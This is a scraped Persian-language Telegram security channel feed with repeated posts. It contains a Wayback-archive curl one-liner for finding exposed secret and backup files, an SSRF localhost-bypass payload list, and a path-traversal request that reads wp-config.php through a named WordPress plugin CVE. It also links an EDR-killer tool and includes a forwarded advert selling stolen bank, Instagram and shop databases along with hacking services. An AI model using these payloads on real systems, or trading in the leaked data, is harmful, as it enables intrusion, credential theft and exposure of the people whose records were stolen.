من اینهمه دوگانگی در دانشگاه های کشور ، ایجاد دو قطبی و هرج و مرج رو فقط از چشم یک نفر میبینم شمارو نمیدونم …
👌8❤1👍1👎1
CDX API در Internet Archive ابزار بسیار مفیدی است، مخصوصا اگر بتوان آن را با نرم افزارهای جانبی ترکیب کرد
می توان آن را داخل یک oneliner سریع قرار داد و سپس روی پورت های 80 و 443 و سایر پورت ها بررسی تکمیلی انجام داد:
یا می توان آن را داخل یک اسکریپت bash کامل تر قرار داد و با ابزارهایی مثل subfinder ، amass و httpx ترکیب کرد.
می توان زنجیره های مختلفی ساخت، مثلا:
subfinder + httpx + waybackurls یا gau یا katana + uro + gf patterns
خروجی: کشف XSS ، SQLi ، Open Redirect و موارد دیگر
یا
subfinder + httpx + katana + grep '.js$' + nuclei -t exposures
خروجی: کشف API key ، JWT secret ، AWS key ، endpoint و موارد مشابه
در عمل ترکیب ها تقریبا نامحدود هستند.
⭐️ @radvansec
web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original&filter=original:.*\.(xls|xml|xlsx|json|pdf|sql|doc|docx|pptx|txt|git|tar\.gz|tgz|bak|7z|rar|log|cache|secret|db|backup|yml|gz|config|csv|yaml|md|md5|exe|dll|bin|ini|bat|sh|tar|deb|rpm|iso|img|env|apk|msi|dmg|tmp|crt|pem|key|pub|asc)$
می توان آن را داخل یک oneliner سریع قرار داد و سپس روی پورت های 80 و 443 و سایر پورت ها بررسی تکمیلی انجام داد:
domain="example.com"
ext='(xls|xml|xlsx|json|pdf|sql|doc|docx|pptx|txt|git|tar\.gz|tgz|bak|7z|rar|log|cache|secret|db|backup|yml|gz|config|csv|yaml|md|md5|exe|dll|bin|ini|bat|sh|tar|deb|rpm|iso|img|env|apk|msi|dmg|tmp|crt|pem|key|pub|asc)'
curl -s "https://web.archive.org/cdx/search/cdx?url=*.$domain/*&collapse=urlkey&output=text&fl=original&filter=original:.*\.${ext}$" \
| sed 's/:80\//\//; s/:443\//\//' \
| sort -u \
| tee "wayback_files_${domain}.txt"
یا می توان آن را داخل یک اسکریپت bash کامل تر قرار داد و با ابزارهایی مثل subfinder ، amass و httpx ترکیب کرد.
می توان زنجیره های مختلفی ساخت، مثلا:
subfinder + httpx + waybackurls یا gau یا katana + uro + gf patterns
خروجی: کشف XSS ، SQLi ، Open Redirect و موارد دیگر
یا
subfinder + httpx + katana + grep '.js$' + nuclei -t exposures
خروجی: کشف API key ، JWT secret ، AWS key ، endpoint و موارد مشابه
در عمل ترکیب ها تقریبا نامحدود هستند.
⭐️ @radvansec
❤2👍1🔥1
List of localhost addresses for SSRF bypass
http://localhost
http://127.1
[http://127.0.0.0](http://127.0.0.0/)
http://2130706433
http://0177.1
http://0x7f.1
http://127.000.000.1
http://localtest .me
http://[::1]
http://[::]
⭐️ @radvansec
http://localhost
http://127.1
[http://127.0.0.0](http://127.0.0.0/)
http://2130706433
http://0177.1
http://0x7f.1
http://127.000.000.1
http://localtest .me
http://[::1]
http://[::]
⭐️ @radvansec
❤3👍3🌚1
گروه هکری ایرانی موسوم به آب گلآلود MuddyWater در قالب یک کمپین جدید با نام رمز «عملیات اولالامپو» (Operation Olalampo)، سازمانها و افراد متعددی را عمدتاً در منطقه خاورمیانه و شمال آفریقا (MENA) هدف قرار داده است. این فعالیت که از ۲۶ ژانویه ۲۰۲۶ رصد شده، منجر به استقرار خانوادههای جدیدی از بدافزار شده است؛ از جمله دانلودرهای (downloader) GhostFetch و HTTP_VIP، یک درپشتی (backdoor) مبتنی بر زبان برنامهنویسی Rust با نام CHAR، و یک ایمپلنت (implant) پیشرفته به نام GhostBackDoor. به گزارش شرکت Group-IB، زنجیره حملات با ارسال ایمیلهای فیشینگ (phishing) حاوی اسناد مایکروسافت آفیس آغاز میشود که کدهای ماکروی مخرب در آنها تعبیه شده و کنترل از راه دور سیستم قربانی را برای مهاجمان فراهم میکند.
تحلیل کد منبع بدافزار CHAR نشانههایی از توسعه با کمک هوش مصنوعی (AI) را آشکار کرده که با اطلاعات قبلی گوگل مبنی بر آزمایش این گروه با ابزارهای هوش مصنوعی مولد (generative AI) برای ساخت بدافزارهای سفارشی همخوانی دارد.
⭐️ @radvansec
تحلیل کد منبع بدافزار CHAR نشانههایی از توسعه با کمک هوش مصنوعی (AI) را آشکار کرده که با اطلاعات قبلی گوگل مبنی بر آزمایش این گروه با ابزارهای هوش مصنوعی مولد (generative AI) برای ساخت بدافزارهای سفارشی همخوانی دارد.
⭐️ @radvansec
❤6
Forwarded from Mr ghost
🔥فروش انواع دیتاب+س(پابلیک شده/پابلیک نشده
🔸دیتای اینستاگرام آپدیت (17M) رکورد
🔸قلم چی vip
🔸30 سایت فروشگاهی ایرانی vip
🔸اسنپ vip
🔸بانک کشاورزی و سپه vip
🔸20 شاپ ویتنامی vip
🔸10 شاپ هندی بزرگ vip
🔸5 شاپ رندوم vip
🔸مکتبخانه کامل دامپ شده vip
🔸سایت کاریابی کارگر vip
🔸نوبت دکتر مامائی vip
🔸تمامی دیتابیس های پابلیک
⛓انجام خدمات مجازی (ممبرزنی، سینزنی، ساخت ربات و ...)
⛓درخواستی (اوسینت و ه.ک)
⛓فیلتر شکن تک کاربره عالی
⛓شماره مجازی(اکانت قدیمی موجود)
⛓آموزش اوسینت
⛓آموزش وب ه.کینگ شامل:
Xss/Sql/ROE/Rfu
⛓انواع آموزش اسکن انواع شل
استعلام قیمت پیوی
🔸دیتای اینستاگرام آپدیت (17M) رکورد
🔸قلم چی vip
🔸30 سایت فروشگاهی ایرانی vip
🔸اسنپ vip
🔸بانک کشاورزی و سپه vip
🔸20 شاپ ویتنامی vip
🔸10 شاپ هندی بزرگ vip
🔸5 شاپ رندوم vip
🔸مکتبخانه کامل دامپ شده vip
🔸سایت کاریابی کارگر vip
🔸نوبت دکتر مامائی vip
🔸تمامی دیتابیس های پابلیک
⛓انجام خدمات مجازی (ممبرزنی، سینزنی، ساخت ربات و ...)
⛓درخواستی (اوسینت و ه.ک)
⛓فیلتر شکن تک کاربره عالی
⛓شماره مجازی(اکانت قدیمی موجود)
⛓آموزش اوسینت
⛓آموزش وب ه.کینگ شامل:
Xss/Sql/ROE/Rfu
⛓انواع آموزش اسکن انواع شل
استعلام قیمت پیوی
🗿5👎1🤯1🥱1👻1
Sin0x001
⛓آموزش وب ه.کینگ شامل:
Xss/Sql/ROE/Rfu
Xss/Sql/ROE/Rfu
لا به لای خدماتش آموزش وب هکینگ هم هست😂😂😂😂😂😂😂😂😂
❤4🗿4
RadvanSec
AI.pdf
کتاب ۲۷ فصل دارد ولی برای کسانی که امنیت کار میکنن این مسیر پیشنهاد میشه ابتدا با فصل ۱-۲ مفاهیم پایه شروع کنید بعد فصل ۱۹ یادگیری ماشین که مهمترین بخش هست و سپس فصل ۲۱ یادگیری عمیق قلب تپنده حملات مدرن رو میتونید پوشش بدید و در ادامه فصل های ۱۲-۱۴ شامل عدم قطعیت و احتمالا و سپس فصل ۲۲ یادگیری تقویتی و و درنهایت فصل ۲۷ فلسفه و اخلاقیات که میتونید گسیل بدید به مباحث امنیت
👍6🙏1
Forwarded from ARVIN
امروز به برسی آسیب پذیری Path Traversalدر پلاگین وردپرس WP Responsive Images می پردازیم
در سورس پارامتر src از کاربر دریافت میشه در اینجا هیچ وایتلیستی نیست در فانکشن sendFileحجت تموم میشه!
https://www.cve.org/CVERecord?id=CVE-2026-1557
در سورس پارامتر src از کاربر دریافت میشه در اینجا هیچ وایتلیستی نیست در فانکشن sendFileحجت تموم میشه!
https://www.cve.org/CVERecord?id=CVE-2026-1557
❤3
Forwarded from ARVIN
ARVIN
امروز به برسی آسیب پذیری Path Traversalدر پلاگین وردپرس WP Responsive Images می پردازیم در سورس پارامتر src از کاربر دریافت میشه در اینجا هیچ وایتلیستی نیست در فانکشن sendFileحجت تموم میشه! https://www.cve.org/CVERecord?id=CVE-2026-1557
GET /wp-content/plugins/wp-responsive-images/image_handler.php?src=../../../../wp-config.php HTTP/1.1
Host: localhost
❤6
حاج عباسو بفرستیم مذاکره با تریاژر های باگکراد 😂😂
P1 -> P999999999999999
تضمینی😂😂
P1 -> P999999999999999
تضمینی😂😂
🔥4😁3🤪2😎1
RadvanSec
حاج عباسو بفرستیم مذاکره با تریاژر های باگکراد 😂😂 P1 -> P999999999999999 تضمینی😂😂
Better Call Abbas
😁5🤪1
EDR Killer
با استفاده از یک اسیب پذیری در درایور wsftprm.sys آنتی ویروس ها و EDR رو از کار میندازه
https://github.com/ThanniKudam/TopazTerminator
تست کردید بگید ببینیم چطوره 👍
با استفاده از یک اسیب پذیری در درایور wsftprm.sys آنتی ویروس ها و EDR رو از کار میندازه
https://github.com/ThanniKudam/TopazTerminator
تست کردید بگید ببینیم چطوره 👍
GitHub
GitHub - ThanniKudam/TopazTerminator: Just another EDR killer
Just another EDR killer. Contribute to ThanniKudam/TopazTerminator development by creating an account on GitHub.
👍4❤1